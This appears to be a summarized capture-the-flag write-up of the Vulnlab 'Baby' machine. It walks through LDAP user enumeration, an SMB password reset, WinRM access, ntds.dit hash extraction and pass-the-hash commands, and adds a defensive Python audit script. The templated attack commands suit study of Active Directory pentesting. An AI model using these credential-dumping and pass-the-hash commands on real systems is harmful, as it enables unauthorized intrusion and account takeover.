Exploiting LDAP and SMB for Privilege Escalation in Vulnlab Machine: Baby


Overview:

  • Enumeration:
    The tester employed LDAP queries to extract domain users and conducted username mutations to facilitate credential stuffing attempts.
  • Initial Foothold:
    The tester identified an account marked with the `STATUS_PASSWORD_MUST_CHANGE` flag. Subsequently, the tester utilized the `smbpasswd` command to reset the password, thereby gaining access through both SMB and WinRM protocols.
  • Privilege Escalation:
    The tester obtained `ntds.dit` from copied files, ran `impacket-secretsdump` against it to recover the Administrator's hash, and used that hash to gain full control of the system.

You Should Know:

1. LDAP Enumeration Commands:

ldapsearch -x -H ldap://<domain_controller> -b "dc=example,dc=com" "(objectClass=user)"

This command queries the LDAP server for user objects within the specified domain. `-x` performs a simple bind (anonymous here; add `-D <bind_dn> -w <password>` for an authenticated bind), and `-H ldap://...` replaces the deprecated `-h` host option in current OpenLDAP clients.
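Because the foothold on this machine depends on an account left in the "must change password at next logon" state, a defender can audit the same LDAP output for that condition. The following is an added example, not part of the original write-up: it parses constructed `ldapsearch` LDIF output and flags enabled users whose `pwdLastSet` is 0 or whose `userAccountControl` carries the `PASSWD_NOTREQD` or `DONT_EXPIRE_PASSWORD` bits.

```python
from typing import Dict, List, Tuple

# Constructed LDIF sample standing in for real ldapsearch output (not real data).
SAMPLE_LDIF = """\
dn: CN=Jane Doe,CN=Users,DC=example,DC=com
sAMAccountName: jane.doe
userAccountControl: 512
pwdLastSet: 133500000000000000

dn: CN=Svc Backup,CN=Users,DC=example,DC=com
sAMAccountName: svc_backup
userAccountControl: 66080
pwdLastSet: 0

dn: CN=Old User,CN=Users,DC=example,DC=com
sAMAccountName: old.user
userAccountControl: 514
pwdLastSet: 0
"""

# userAccountControl bit flags as documented for Active Directory.
UAC_ACCOUNTDISABLE = 0x0002
UAC_PASSWD_NOTREQD = 0x0020
UAC_DONT_EXPIRE_PASSWORD = 0x10000


def parse_ldif(text: str) -> List[Dict[str, str]]:
    """Split LDIF into one dict per entry; folded lines (leading space) are unwrapped."""
    entries: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in text.replace("\n ", "").splitlines():
        if not line.strip():            # blank line ends an entry
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):        # LDIF comment
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.lstrip(": ").strip()  # base64 ('::') values kept undecoded
    if current:
        entries.append(current)
    return entries


def audit_users(entries: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (account, finding) pairs for enabled users with risky password state."""
    findings: List[Tuple[str, str]] = []
    for e in entries:
        name = e.get("sAMAccountName", e.get("dn", "?"))
        uac = int(e.get("userAccountControl", "0"))
        if uac & UAC_ACCOUNTDISABLE:
            continue                    # disabled accounts cannot log on; skip them
        if e.get("pwdLastSet") == "0":  # 0 == "user must change password at next logon"
            findings.append((name, "password must change at next logon"))
        if uac & UAC_PASSWD_NOTREQD:
            findings.append((name, "PASSWD_NOTREQD set"))
        if uac & UAC_DONT_EXPIRE_PASSWORD:
            findings.append((name, "password never expires"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_users(parse_ldif(SAMPLE_LDIF)):
        print(f"{account}: {finding}")
```

Feed it real output with `ldapsearch ... sAMAccountName userAccountControl pwdLastSet > users.ldif` and every account flagged "must change at next logon" is one whose password can be set over SMB by anyone holding its current credentials.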

2. SMB Password Reset:

smbpasswd -r <domain_controller> -U <username>

Use this command to reset a user’s password on an SMB server.

3. WinRM Access:

evil-winrm -i <target_ip> -u <username> -p <password>

This command allows you to access a Windows machine via WinRM using compromised credentials.

4. Extracting NTDS.dit:

impacket-secretsdump -ntds <ntds_path> -system <system_path> LOCAL

This command extracts hashes from the `ntds.dit` file, which contains Active Directory data.

5. Privilege Escalation with Impacket:

impacket-psexec <username>@<target_ip> -hashes <lm_hash>:<nt_hash>

This command allows you to execute commands on a remote system using extracted hashes.

What Undercode Say:

In this article, we explored how to exploit LDAP and SMB vulnerabilities to gain initial access and escalate privileges on a target system. The use of tools like ldapsearch, smbpasswd, and `impacket-secretsdump` highlights the importance of understanding both enumeration and exploitation techniques in penetration testing. Below are additional commands that can be useful in similar scenarios:

  • Enumerate SMB Shares:
    smbclient -L //<target_ip> -U <username>
    
  • Dump SAM Database:
    impacket-secretsdump -sam <sam_path> -system <system_path> LOCAL
    
  • Pass-the-Hash Attack:
    impacket-wmiexec -hashes <lm_hash>:<nt_hash> <username>@<target_ip>
    
  • Extract Kerberos Tickets:
    impacket-getTGT -dc-ip <domain_controller> <domain>/<username>:<password>
    
  • Enumerate Domain SIDs and Users (RID cycling over MSRPC, not DNS):
    impacket-lookupsid <username>@<target_ip>
    

These commands and techniques are essential for anyone looking to deepen their understanding of Windows-based penetration testing and privilege escalation. Always ensure you have proper authorization before performing any of these actions on a target system.

References:

Reported By: Thienle2208 Vulnlab – Hackers Feeds